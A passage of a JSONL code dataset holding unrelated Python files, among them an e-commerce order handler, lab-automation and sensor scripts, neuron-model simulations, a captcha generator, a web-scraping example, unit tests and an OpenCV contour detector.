Updating: {} skipped because of 0 qty'.format(order_item.simple_sku.value))\n continue\n\n __log_flow('Product Qty Updating {} / {} ...'.format(\n order_item.simple_sku.value,\n order_item.qty_processable.value\n ))\n\n product = self.__products_storage.load(order_item.simple_sku)\n product.restore_qty(order_item.qty_processable)\n products_to_save.append(product)\n\n __log_flow('Product Qty Updated {} / {}!'.format(\n order_item.simple_sku.value,\n order_item.qty_processable.value\n ))\n\n __log_flow('Product Qty Updating - End')\n\n __log_flow('Updated!')\n\n __log_flow('Saving...')\n\n __log_flow('Order Saving...')\n self.__order_storage.save(order)\n __log_flow('Order Saved!')\n\n __log_flow('Products Saving...')\n for product in products_to_save:\n __log_flow('Product {} Saving...'.format(product.simple_sku.value))\n self.__products_storage.update(product)\n __log_flow('Product {} Saved!'.format(product.simple_sku.value))\n __log_flow('Products Saved!')\n\n __log_flow('Saved!')\n\n def __send_order_change_to_portal(self, order: Order, __log_flow) -> None:\n __log_flow('Order SQS: Sending...')\n self.__sqs_sender.send(OrderChangeSqsSenderEvent(order))\n __log_flow('Order SQS: Sent!')\n\n def __notify_about_order_status_change_silently(self, order: Order, __log_flow) -> None:\n try:\n __log_flow('Notification popup: Adding...')\n customer = self.__customer_storage.get_by_id(order.customer_id)\n self.__message_storage.save(Message(\n str(uuid.uuid4()),\n customer.email.value,\n 'Order #{} status is changed!',\n 'Order #{} has been turned to \"{}\" status!'.format(order.number.value, order.status.label)\n ))\n __log_flow('Notification popup: Added!')\n except BaseException as e:\n self.__logger.log_exception(e)\n __log_flow('Notification popup: Not Added because of Error : {}'.format(str(e)))\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n","sub_path":"chalicelib/libs/purchase/order/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":11627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466411052","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 8 00:00:17 2016\n@author: MPE\n\"\"\"\nfrom sense_hat import SenseHat\nsense=SenseHat()\n\nHumedad=sense.get_humidity()\nTemp1=sense.get_temperature_from_humidity()\nTemp2=sense.get_temperature_from_pressure()\nPresion=sense.get_pressure()\nprint(\"Humedad: %2.3f\" %Humedad)\nprint(\"Temperaturas: %2.3f %2.3f\" % (Temp1,Temp2))\nprint(\"Presión: %4.2f\" %Presion)\n\nTStr=str(round(Temp1,2))\nsense.show_message(\"T:\"+TStr)","sub_path":"prueba_sensores.py","file_name":"prueba_sensores.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"492387920","text":"metadata = {\n 'protocolName': 'Adding Developer Solution to 216 Well Cartridge Plate',\n 'author': 'Rami Farawi ',\n 'source': 'Custom Protocol Request',\n 'apiLevel': '2.9'\n}\n\n\ndef run(ctx):\n\n [height_above_cartridge,\n disp_vol, disp_rate, p300_mount] = get_values( # noqa: F821\n \"height_above_cartridge\", \"disp_vol\", \"disp_rate\", \"p300_mount\")\n\n if not 0.1 <= height_above_cartridge <= 10:\n raise Exception(\"Enter a height between 1 and 10mm\")\n if not 1 <= disp_vol <= 85:\n raise Exception(\"Enter a dispense volume between 1 and 85µL\")\n\n # load labware\n plate = ctx.load_labware('invoy_216_well_cartridge_plate', '1')\n reservoir = ctx.load_labware('nest_1_reservoir_195ml', '6')\n tiprack = ctx.load_labware('opentrons_96_tiprack_300ul', '9')\n\n # load instruments\n p300 = ctx.load_instrument('p300_single_gen2', p300_mount,\n tip_racks=[tiprack])\n\n # protocol\n p300.flow_rate.dispense = disp_rate\n chunks = [plate.wells()[i:i+3] for i in range(0, len(plate.wells()), 3)]\n p300.pick_up_tip()\n for chunk in chunks:\n p300.distribute(disp_vol, reservoir.wells()[0],\n [well.top(height_above_cartridge)\n for well in chunk],\n new_tip='never',\n blow_out=True,\n blowout_location='source well')\n p300.drop_tip()\n","sub_path":"protocols/7f0f89/7f0f89.ot2.apiv2.py","file_name":"7f0f89.ot2.apiv2.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"157916670","text":"'''\nCPSC 415 -- Homework #1 support file\nStephen Davies, University of Mary Washington, fall 2017\nBased somewhat on AIMA's git@github.com:aimacode/aima-python.git agents.py.\n'''\n\nimport logging\nimport sys\nimport random\n\nfrom agent import *\nfrom environment import *\n\n\n\nclass VacuumAgent(Agent):\n image_filename = 'cleaner.gif'\n possible_actions = ['Right', 'Left', 'Up', 'Down', 'Suck', 'NoOp']\n def __init__(self):\n super().__init__()\n self._bump = False\n\n\nclass VacuumEnvironment(XYEnvironment):\n\n \"\"\"The environment of [Ex. 2.12]. Agent perceives dirty or clean, and bump\n (into obstacle) or not; 2D discrete world of unknown size; performance\n measure is 50 for each square of dirt cleaned, -2 for each 'suck' action,\n and -1 for each move action.\"\"\"\n\n def __init__(self, width=10, height=10):\n super().__init__(width, height)\n self.add_walls()\n\n def thing_classes(self):\n return [Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,\n TableDrivenVacuumAgent, ModelBasedVacuumAgent]\n\n def percept(self, agent):\n \"\"\"The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').\n Unlike the TrivialVacuumEnvironment, location is NOT perceived.\"\"\"\n status = ('Dirty' if self.some_things_at(\n self[agent], Dirt) else 'Clean')\n bump = ('Bump' if agent._bump else 'None')\n return (status, bump)\n\n def execute_action(self, agent, action):\n if action not in agent.possible_actions:\n print(\"Illegal action {}! Shutting down.\".format(action))\n sys.exit(1)\n if action == 'Suck':\n agent.performance -= 2\n dirt_list = self.list_things_at(self[agent], Dirt)\n if dirt_list != []:\n dirt = dirt_list[0]\n agent.performance += 50\n self.delete_thing(dirt)\n else:\n super().execute_action(agent, action)\n\n if action in {'Left','Right','Up','Down'}:\n agent.performance -= 1\n\n def is_clean(self):\n return all([ type(thing) is not Dirt for thing in self ])\n\n def should_shutdown(self):\n return self.is_clean()\n\n def add_to_random_empty_square(self, thing):\n possible_squares = [(x,y) for x in range(self.width) \n for y in range(self.height) if (x,y) not in self.values()]\n self.add_thing(thing,random.choice(possible_squares))\n \n\nclass DirtyVacuumEnvironment(VacuumEnvironment):\n\n def __init__(self, width=10, height=10, dirt_prob=.5):\n super().__init__(width, height)\n self.width=width\n self.height=height\n self.dirt_prob=dirt_prob\n self._scatter_dirt()\n\n def _scatter_object(self, cls, prob=.5):\n '''Randomly put down an object of the class passed on every empty \n square, with probability passed.'''\n possible_squares = [(x,y) for x in range(self.width) \n for y in range(self.height) if (x,y) not in self.values()]\n for sq in possible_squares:\n if random.random() < prob:\n self.add_thing(cls(), sq)\n\n def _scatter_dirt(self):\n self._scatter_object(Dirt, self.dirt_prob)\n\n\nclass RandomDirtyVacuumEnvironment(DirtyVacuumEnvironment):\n\n def __init__(self, width_range=(10,20), height_range=(10,20)):\n super().__init__(\n random.randint(*width_range), random.randint(*height_range))\n self._add_walls()\n\n def _add_walls(self):\n self._scatter_object(Wall, .2)\n\n\n\nclass Dirt(Thing):\n image_filename = 'dirt.gif'\n","sub_path":"vacuum.py","file_name":"vacuum.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"127726571","text":"# coding: utf-8\n\n\"\"\"\n MDES for Merchants\n\n The MDES APIs are designed as RPC style stateless web services where each API endpoint represents an operation to be performed. All request and response payloads are sent in the JSON (JavaScript Object Notation) data-interchange format. Each endpoint in the API specifies the HTTP Method used to access it. All strings in request and response objects are to be UTF-8 encoded. Each API URI includes the major and minor version of API that it conforms to. This will allow multiple concurrent versions of the API to be deployed simultaneously. # noqa: E501\n\n The version of the OpenAPI document: 1.2.7\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass TokenDetailData(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'token_number': 'str',\n 'expiry_month': 'str',\n 'expiry_year': 'str',\n 'data_valid_until_timestamp': 'str',\n 'payment_account_reference': 'str'\n }\n\n attribute_map = {\n 'token_number': 'tokenNumber',\n 'expiry_month': 'expiryMonth',\n 'expiry_year': 'expiryYear',\n 'data_valid_until_timestamp': 'dataValidUntilTimestamp',\n 'payment_account_reference': 'paymentAccountReference'\n }\n\n def __init__(self, token_number=None, expiry_month=None, expiry_year=None, data_valid_until_timestamp=None, payment_account_reference=None): # noqa: E501\n \"\"\"TokenDetailData - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._token_number = None\n self._expiry_month = None\n self._expiry_year = None\n self._data_valid_until_timestamp = None\n self._payment_account_reference = None\n self.discriminator = None\n\n if token_number is not None:\n self.token_number = token_number\n if expiry_month is not None:\n self.expiry_month = expiry_month\n if expiry_year is not None:\n self.expiry_year = expiry_year\n if data_valid_until_timestamp is not None:\n self.data_valid_until_timestamp = data_valid_until_timestamp\n if payment_account_reference is not None:\n self.payment_account_reference = payment_account_reference\n\n @property\n def token_number(self):\n \"\"\"Gets the token_number of this TokenDetailData. # noqa: E501\n\n Globally unique identifier for the Token, as assigned by MDES. __Max Length:64__ # noqa: E501\n\n :return: The token_number of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._token_number\n\n @token_number.setter\n def token_number(self, token_number):\n \"\"\"Sets the token_number of this TokenDetailData.\n\n Globally unique identifier for the Token, as assigned by MDES. __Max Length:64__ # noqa: E501\n\n :param token_number: The token_number of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._token_number = token_number\n\n @property\n def expiry_month(self):\n \"\"\"Gets the expiry_month of this TokenDetailData. # noqa: E501\n\n The expiry month for the account. # noqa: E501\n\n :return: The expiry_month of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._expiry_month\n\n @expiry_month.setter\n def expiry_month(self, expiry_month):\n \"\"\"Sets the expiry_month of this TokenDetailData.\n\n The expiry month for the account. # noqa: E501\n\n :param expiry_month: The expiry_month of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._expiry_month = expiry_month\n\n @property\n def expiry_year(self):\n \"\"\"Gets the expiry_year of this TokenDetailData. # noqa: E501\n\n The expiry year for the account. # noqa: E501\n\n :return: The expiry_year of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._expiry_year\n\n @expiry_year.setter\n def expiry_year(self, expiry_year):\n \"\"\"Sets the expiry_year of this TokenDetailData.\n\n The expiry year for the account. # noqa: E501\n\n :param expiry_year: The expiry_year of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._expiry_year = expiry_year\n\n @property\n def data_valid_until_timestamp(self):\n \"\"\"Gets the data_valid_until_timestamp of this TokenDetailData. # noqa: E501\n\n \\\"The date/time after which this CardInfoData object is considered invalid. If present, all systems must reject this CardInfoData object after this time and treat it as invalid data. Must be expressed in ISO 8601 extended format as one of the following: YYYY-MM-DDThh:mm:ss[.sss]Z YYYY-MM-DDThh:mm:ss[.sss]�hh:mm Where [.sss] is optional and can be 1 to 3 digits. Must be a value no more than 30 days in the future. MasterCard recommends using a value of (Current Time + 30 minutes).\\\" # noqa: E501\n\n :return: The data_valid_until_timestamp of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._data_valid_until_timestamp\n\n @data_valid_until_timestamp.setter\n def data_valid_until_timestamp(self, data_valid_until_timestamp):\n \"\"\"Sets the data_valid_until_timestamp of this TokenDetailData.\n\n \\\"The date/time after which this CardInfoData object is considered invalid. If present, all systems must reject this CardInfoData object after this time and treat it as invalid data. Must be expressed in ISO 8601 extended format as one of the following: YYYY-MM-DDThh:mm:ss[.sss]Z YYYY-MM-DDThh:mm:ss[.sss]�hh:mm Where [.sss] is optional and can be 1 to 3 digits. Must be a value no more than 30 days in the future. MasterCard recommends using a value of (Current Time + 30 minutes).\\\" # noqa: E501\n\n :param data_valid_until_timestamp: The data_valid_until_timestamp of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._data_valid_until_timestamp = data_valid_until_timestamp\n\n @property\n def payment_account_reference(self):\n \"\"\"Gets the payment_account_reference of this TokenDetailData. # noqa: E501\n\n \\\"The unique account reference assigned to the PAN. Conditionally returned if the Token Requestor has opted to receive PAR and providing PAR is assigned by Mastercard or the Issuer provides PAR in the authorization message response. __Max Length:__ - 29\\\" # noqa: E501\n\n :return: The payment_account_reference of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._payment_account_reference\n\n @payment_account_reference.setter\n def payment_account_reference(self, payment_account_reference):\n \"\"\"Sets the payment_account_reference of this TokenDetailData.\n\n \\\"The unique account reference assigned to the PAN. Conditionally returned if the Token Requestor has opted to receive PAR and providing PAR is assigned by Mastercard or the Issuer provides PAR in the authorization message response. __Max Length:__ - 29\\\" # noqa: E501\n\n :param payment_account_reference: The payment_account_reference of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._payment_account_reference = payment_account_reference\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, TokenDetailData):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"rest_client_python/openapi_client/models/token_detail_data.py","file_name":"token_detail_data.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"198517268","text":"\"\"\"\nTests for dit.algorithms.lattice\n\"\"\"\n\nfrom __future__ import division\n\nfrom iterutils import powerset\n\nfrom nose.tools import assert_equal, assert_raises\n\nimport numpy as np\nimport numpy.testing as npt\n\nfrom dit import Distribution, ScalarDistribution\nfrom dit.algorithms.lattice import (dist_from_induced_sigalg, insert_join,\n join, join_sigalg, meet, meet_sigalg,\n sigma_algebra_sort)\n\ndef test_sigalg_sort():\n \"\"\" Test sigma_algebra_sort \"\"\"\n sigalg = frozenset([\n frozenset([]),\n frozenset([1]),\n frozenset([2]),\n frozenset([1, 2])\n ])\n sigalg_ = [(), (1,), (2,), (1, 2)]\n assert_equal(sigalg_, sigma_algebra_sort(sigalg))\n\ndef test_join_sigalg():\n \"\"\" Test join_sigalg \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n sigalg = frozenset([frozenset(_) for _ in powerset(outcomes)])\n joined = join_sigalg(d, [[0], [1]])\n assert_equal(sigalg, joined)\n\ndef test_meet_sigalg():\n \"\"\" Test meet_sigalg \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n sigalg = frozenset([frozenset([]), frozenset(outcomes)])\n meeted = meet_sigalg(d, [[0], [1]])\n assert_equal(sigalg, meeted)\n\ndef test_dist_from_induced():\n \"\"\" Test dist_from_induced_sigalg \"\"\"\n outcomes = [(0,), (1,), (2,)]\n pmf = np.array([1/3] * 3)\n d = ScalarDistribution(outcomes, pmf)\n\n sigalg = frozenset(map(frozenset, d.event_space()))\n d2 = dist_from_induced_sigalg(d, sigalg)\n npt.assert_allclose(pmf, d2.pmf)\n\n sigalg = [(), ((0,),), ((1,), (2,)), ((0,), (1,), (2,))]\n sigalg = frozenset(map(frozenset, sigalg))\n d2 = dist_from_induced_sigalg(d, sigalg, int_outcomes=True)\n pmf = np.array([1/3, 2/3])\n npt.assert_allclose(pmf, d2.pmf)\n\n d2 = dist_from_induced_sigalg(d, sigalg, int_outcomes=False)\n outcomes = (((0,),), ((1,), (2,)))\n assert_equal(outcomes, d2.outcomes)\n\ndef test_join():\n \"\"\" Test join \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n d2 = join(d, [[0], [1]])\n assert_equal(d2.outcomes, (0, 1, 2, 3))\n npt.assert_allclose(d2.pmf, d.pmf)\n\ndef test_meet():\n \"\"\" Test meet \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n d2 = meet(d, [[0], [1]])\n assert_equal(d2.outcomes, (0,))\n npt.assert_allclose(d2.pmf, [1])\n\ndef test_insert_join():\n \"\"\" Test insert_join \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n assert_raises(IndexError, insert_join, d, 5, [[0], [1]])\n\n for idx in range(d.outcome_length()):\n d2 = insert_join(d, idx, [[0], [1]])\n m = d2.marginal([idx])\n npt.assert_allclose(d2.pmf, m.pmf)\n","sub_path":"dit/algorithms/tests/test_lattice.py","file_name":"test_lattice.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466923267","text":"#!/usr/bin/python3\n\nfrom collections import namedtuple\nimport re\n\nwith open('input.txt', 'r') as f:\n lines = f.readlines()\n\nPoint = namedtuple('Point', [ 'col', 'row' ])\n\nclass Array:\n\n def __init__(self, cols, rows):\n self.__cols = cols\n self.__rows = rows\n self.__data = [ [False]*cols for i in range(rows) ]\n\n def count(self):\n total = 0\n for col in range(self.__cols):\n for row in range(self.__rows):\n if self.__data[row][col]:\n total+=1\n return total\n\n def set(self,col,row):\n #print(\"set\", row, col)\n self.__data[row][col] = True\n\n def clear(self,col,row):\n #print(\"clr\", row, col)\n self.__data[row][col] = False\n\n def toggle(self,col,row):\n #print(\"tgl\", row, col)\n self.__data[row][col] = not self.__data[row][col]\n\n def apply(self,op,p1,p2):\n if op == 'turn on':\n fn = Array.set\n elif op == 'turn off':\n fn = Array.clear\n elif op == 'toggle':\n fn = Array.toggle\n else:\n raise Exception(\"invalid op '%s'\" % op)\n\n for col in range(p1.col, p2.col+1):\n for row in range(p1.row, p2.row+1):\n fn(self,col,row)\n\narray = Array(1000, 1000)\n\nfor line in lines:\n m = re.match('(turn on|turn off|toggle) (\\d+),(\\d+) through (\\d+),(\\d+)', line)\n if m:\n p1 = Point(int(m.group(2)), int(m.group(3)))\n p2 = Point(int(m.group(4)), int(m.group(5)))\n array.apply(m.group(1), p1, p2)\n else:\n raise Exception(\"failed parsing '%s'\" % line.rtrim())\n\n\nprint(array.count())\n","sub_path":"2015/6/6-1.py","file_name":"6-1.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511707610","text":"#This function contains an implementation of the \r\n#Hodgkin-Huxley model\r\n#and the FitzHugh-Nagumo model\r\nimport time;\r\nimport pylab;\r\nimport numpy as np\r\n\r\n#External current function (for pacing)\r\n#It could be used for sensor input later on\r\ndef readExternal():\r\n return 0; \r\n\r\ndef fitzhughNagumo(t_end):\r\n #time step\r\n tstep = 0.01;\r\n #initial values of v and w\r\n v = 2.0; \r\n w = 0.0; \r\n I_ext = 0; \r\n tc = 1.0;\r\n #parameters\r\n a = 1; b = 0.0; c = 0.8;\r\n eps = 10;\r\n #time scale used to shift the model\r\n t_sc = 10; \r\n #end of parameters\r\n inc = 0; \r\n vs = []; \r\n ts = [];\r\n t_now = 0; \r\n ts.append(t_now); \r\n vs.append(v); \r\n while(t_now < t_end):\r\n #calculate the rate of change\r\n I_ext = readExternal();\r\n dv = t_sc*(v - v**3/3 - w + I_ext)\r\n dw = t_sc*(1.0/eps*(a*v+b-c*w));\r\n #calculate the value of v based on the rate of change\r\n v = v+tstep*dv; \r\n w = w+tstep*dw; \r\n t_now = t_now+tstep;\r\n \r\n ts.append(t_now); \r\n vs.append(v);\r\n \r\n pylab.plot(ts, vs);\r\n pylab.xlabel('time in seconds');\r\n pylab.ylabel('Voltage in Volts'); \r\n \r\n\r\ndef HH_model(t_end):\r\n #parameters of the HH model\r\n ENa = 115; gNa = 120; \r\n EK = -12; gK = 36; \r\n EL = 10.6; gL = 0.3; \r\n C = 1;\r\n tstep = 0.01; \r\n t_sc = 10;\r\n v=0; m=0; n=0; h=0; \r\n vs = [];\r\n vs.append(v); \r\n t_now = 0; \r\n ts = []; \r\n ts.append(t_now); \r\n while(t_now < t_end):\r\n INa = gNa*m**3*h*(v-ENa);\r\n IK = gK*n**4*(v-EK);\r\n IL = gL*(v-EL);\r\n I_ext = readExternal(); \r\n \r\n dv = -1.0/C*(INa+IK+IL+I_ext);\r\n dv = dv*t_sc;\r\n\r\n \r\n a_n = (0.1-0.01*v)/(np.exp(1-0.1*v)-1);\r\n b_n = (0.125)*np.exp(-v/80); \r\n \r\n a_m = (2.5-0.1*v)/(np.exp(2.5-0.1*v)-1); \r\n b_m = 4*np.exp(-v/18);\r\n \r\n a_h = (0.07*np.exp(-v/20));\r\n b_h = 1/(np.exp(3-0.1*v)+1); \r\n \r\n dm = a_m*(1-m)-b_m*m;\r\n dm = dm*t_sc;\r\n \r\n dn = a_n*(1-n)-b_n*n; \r\n dn = dn*t_sc;\r\n \r\n dh = a_h*(1-h)-b_h*h; \r\n dh = dh*t_sc;\r\n \r\n v = v+tstep*dv; \r\n m = m+tstep*dm; \r\n n = n+tstep*dn; \r\n h = h+tstep*dh; \r\n \r\n t_now = t_now+tstep;\r\n ts.append(t_now);\r\n vs.append(v); \r\n \r\n pylab.plot(ts,vs); \r\n\r\n#Run the HH model \r\npylab.figure(1); \r\nfitzhughNagumo(10);\r\npylab.figure(2);\r\nHH_model(10);","sub_path":"Python/Mechanical Fireflies/FitzhughNagumo_Firefly.py","file_name":"FitzhughNagumo_Firefly.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"637184728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n生成校验码\n\"\"\"\n\nimport os\nimport random\n\nfrom PIL import Image, ImageFont, ImageDraw\n\n_letter_cases = \"abcdefghjkmnpqrstuvwxy\" # 去除可能干扰的i,l,o,z\n_upper_cases = _letter_cases.upper() # 大写字母\n_numbers = ''.join(map(str, range(3, 10))) # 数字\ninit_chars = ''.join((_letter_cases, _upper_cases, _numbers))\n\ncurrentPath = os.path.split(os.path.realpath(__file__))[0]\nfontType = os.path.join(currentPath, 'OpenSans-Bold.ttf')\n\n\ndef create_validate_code(size=(80, 30),\n chars=init_chars,\n img_type=\"PNG\",\n mode=\"RGB\",\n bg_color=(255, 255, 255),\n fg_color=(0, 0, 255),\n font_size=18,\n font_type=fontType,\n length=4,\n draw_lines=True,\n n_line=(1, 2),\n draw_points=True,\n point_chance=2):\n width, height = size # 图像的宽,高\n img = Image.new(mode, size, bg_color) # 创建新图像\n draw = ImageDraw.Draw(img)\n c_chars = random.sample(chars, length)\n strs = ' %s ' % ' '.join(c_chars) # 每个字符前后以空格隔开\n\n font = ImageFont.truetype(font_type, font_size)\n font_width, font_height = font.getsize(strs)\n\n draw.text(((width - font_width) / 3, (height - font_height) / 3), strs, font=font, fill=fg_color)\n\n img.save(os.path.join(currentPath, 'validate.png'), 'PNG') # 存储图片\n\n\nif __name__ == '__main__':\n create_validate_code()\n","sub_path":"gxz1989611/Q0010/generate_captcha.py","file_name":"generate_captcha.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"467586095","text":"from bs4 import BeautifulSoup\nimport requests\n\nurl = \"http://example.com/\"\n\nresponse = requests.get(url)\n\n\ndata = response.text\n\nsoup = BeautifulSoup(data, 'html.parser')\n\ntags = soup.find_all('a')\n\nfor tag in tags:\n print(tag.get('href'))\n\nfor tag in tags:\n print(tag)\n\n# Test easy parser","sub_path":"example 1.py","file_name":"example 1.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"450407193","text":"from pybot import robot\nimport sys\nimport getopt\n\n\n@robot.hear(r\"^badger$\")\ndef badger(res):\n res.send(\"thangs\")\n\n\n@robot.respond(\"say hi\")\ndef say_hi(res):\n res.reply(\"hello\")\n\n\n@robot.hear(r\"open the (.*?) doors\")\ndef open_pod_bay_doors(res):\n door_type = res.match.group(1)\n if door_type == 'pod bay':\n res.reply(\"I'm afraid I can't let you do that\")\n else:\n res.reply(\"Opening {} doors\".format(door_type))\n\n\n@robot.on('connected')\ndef on_connected(data):\n robot.send('shell', \"I am here world\")\n\n\ndef usage():\n print(\"-a adapter\")\n print(\"-h help\")\n\n\nif __name__ == '__main__':\n useful_args = sys.argv[1:]\n try:\n opts, args = getopt.getopt(useful_args, \"a:h\", [\"adapter=\", \"help\"])\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-a\", \"--adapter\"):\n robot.load_adapter(arg)\n\n robot.run()\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"219626144","text":"import numpy as np\r\nimport numpy.random as rd\r\nimport tensorflow as tf\r\ndef numpy_open(path) :\r\n #파일 열기\r\n data = np.genfromtxt(path)\r\n return data\r\n\r\ndef Sigmoid(a):\r\n return (1 / (1 + np.exp(-a)))\r\n\r\ndef Relu(b):\r\n return np.maximum(0,b)\r\ndef SoftMax(s):\r\n e_x = np.exp(x - np.max(x))\r\n return e_x / e_x.sum()\r\npath = './training.dat'\r\ndata = numpy_open(path)\r\nW1 = 2*rd.rand(4,4)-1\r\nW2 = 2*rd.rand(4,3)-1\r\nW3 = 2*rd.rand(3,3)-1\r\n\r\nrate = 0.7\r\nfor i in range(75) :\r\n x = data[i]\r\n print(\"x : \",x)\r\n if 0 <= i < 25 :\r\n d = [1,0,0]\r\n if 25 <= i <50 :\r\n d = [0,1,0]\r\n if 50 <= i <75:\r\n d = [ 0,0,1]\r\n\r\n v1 = np.matmul(x,W1)\r\n y1 = Relu(v1)\r\n v2 = np.matmul(y1,W2)\r\n y2 = Relu(v2)\r\n print(\"y2 :\",y2)\r\n \r\n v3 = np.matmul(y2,W3) # 1,3 3 * 3\r\n y3 = SoftMax(v3)\r\n print(\"y3 : \",y3)\r\n \r\n\r\n \r\n","sub_path":"딥러닝/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"640444975","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n# frame = cv2.imread('mix.jpg')\n\nwhile True:\n ret, frame = cap.read()\n\n filtered = cv2.cvtColor(np.copy(frame), cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(filtered, (0,0,0), (124,255,100))\n\n gray = cv2.cvtColor(np.copy(frame), cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 30, 75, L2gradient=True)\n\n im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n cv2.drawContours(frame, contours, -1, (0,255,0), 3)\n\n for c in contours:\n # rect = cv2.minAreaRect(c)\n # box = cv2.boxPoints(rect)\n # box = np.int0(box)\n hull = cv2.convexHull(c)\n # cv2.drawContours(frame, [hull], 0, (255,0,0), 2)\n\n area = cv2.contourArea(hull)\n perim = cv2.arcLength(hull,True)\n if area > 800 and perim > 80 and area < 2600:\n ratio = area/((perim/4)**2)\n if ratio>0.9 and ratio<1.2:\n cv2.drawContours(frame, [c], 0, (0,0,255), 2)\n\n outp = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\n\n cv2.imshow('Rubik\\'s', np.hstack((frame,outp)))\n cv2.imshow('Contours', edges)\n cv2.imshow('Mask', mask)\n\n key = cv2.waitKey(1) & 0xFF\n if key == 27:\n break","sub_path":"Rubik's Cube Solver/Python/misc/contour_detect.py","file_name":"contour_detect.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"316234357","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport codecs\nimport json\nimport re\nimport urllib\n\nwith codecs.open('download/package-jsons', encoding='utf-8') as in_file, \\\n codecs.open('output.txt', mode='wb', encoding='utf-8') as out_file:\n for package_json in in_file:\n package_dict = json.loads(package_json)\n package_info = package_dict['info']\n\n # Build abstract\n abstract_lines = []\n summary = package_info['summary']\n if not summary or summary == 'UNKNOWN':\n continue\n abstract_lines.append(re.sub(r'\\s', ' 